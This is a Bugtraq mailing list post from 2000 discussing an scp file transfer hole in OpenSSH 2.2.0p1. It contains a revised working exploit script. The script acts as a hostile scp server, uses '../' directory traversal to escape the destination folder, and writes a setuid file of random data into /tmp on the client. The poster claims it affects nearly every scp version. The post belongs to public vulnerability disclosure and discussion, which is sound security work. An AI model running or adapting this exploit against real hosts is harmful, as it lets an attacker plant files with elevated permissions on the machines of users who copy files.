Bugtraq mailing list archives
Re: openssh2.2.p1 - Re: scp file transfer hole
From: Robert Bihlmeyer <robbe () ORCUS PRIV AT>
Date: Mon, 2 Oct 2000 19:06:01 +0200
Martin MaD Douda <martin () DOUDA NET> writes:
Using your scripts I could make suid scpuser's file in /tmp, but probably due to some protocol change in scp, the file was empty and scp has died with "lost connection".
It worked much better for me once I removed all "of=/dev/stdout" from the script. All dd versions that I know have stdout as default output target, anyway. The new version created a 200 byte file alright: -- #!/bin/bash echo "D0755 0 ../../../../../../tmp/nope" echo "D0755 0 ../../../../../../tmp" echo "C4755 200 ScpIsBuggy" dd if=/dev/urandom bs=200 count=1 2>/dev/null dd if=/dev/zero bs=1 count=2 2>/dev/null --
Since openssh 2.2.0p1 is latest existing version, this vulnerability probably exist in every single scp version in the world.
Data Fellows/SSH Communication Security's ssh 2 uses a different file transfer protocol. So the above exploit won't work. That doesn't mean that there are more sanity checks, though. -- Robbe
Attachment:
signature.ng
Description:
Current thread:
- openssh2.2.p1 - Re: scp file transfer hole Martin MaD Douda (Oct 01)
- Re: openssh2.2.p1 - Re: scp file transfer hole Robert Bihlmeyer (Oct 02)